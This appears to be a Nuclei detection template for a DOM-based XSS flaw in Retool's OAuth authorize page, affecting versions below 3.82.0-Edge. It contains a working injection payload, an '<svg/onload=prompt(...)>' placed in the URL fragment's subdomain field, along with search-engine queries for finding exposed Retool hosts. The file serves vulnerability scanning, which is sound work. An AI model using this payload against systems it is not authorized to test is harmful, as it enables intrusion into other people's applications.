35 lines
1.3 KiB
YAML
35 lines
1.3 KiB
YAML
id: retool-dom-xss
|
|
|
|
info:
|
|
name: Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS
|
|
author: rootxharsh,iamnoooob,pdresearch
|
|
severity: high
|
|
description: |
|
|
Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow.
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"Retool"
|
|
fofa-query: body="Retool"
|
|
tags: headless,retool,dom,xss
|
|
|
|
variables:
|
|
random_int: '{{rand_int(1,1000)}}'
|
|
|
|
headless:
|
|
- steps:
|
|
- args:
|
|
url: '{{BaseURL}}/oauth/authorize#%7B%20"redirectUri":%20"zzz",%20"resourceId":%20"fff",%20"resourceName":%20"aa",%20"resourceType":%20"azz",%20"userEmail":%20"aaa@aa.com",%20"userFirstName":%20"zzz",%20"userLastName":%20"zzff",%20"xsrfToken":%20"x","subdomain":"aaa<svg/onload=prompt({{random_int}})>aaaa","accessToken":"ab"%20%7D'
|
|
action: navigate
|
|
|
|
- action: waitdialog
|
|
name: subdomain_object_dom
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- subdomain_object_dom == true
|
|
- subdomain_object_dom_message == random_int
|
|
condition: and
|
|
# digest: 490a004630440220653b28ddb61bdd966eee659ff951e1d849932a1d551174db9b5782efca6d917502205ec3dfad25a750e0d71b62276c50b0729b3489bed42b921d034091dc156c2b29:922c64590222798bb761d5b6d8e72950 |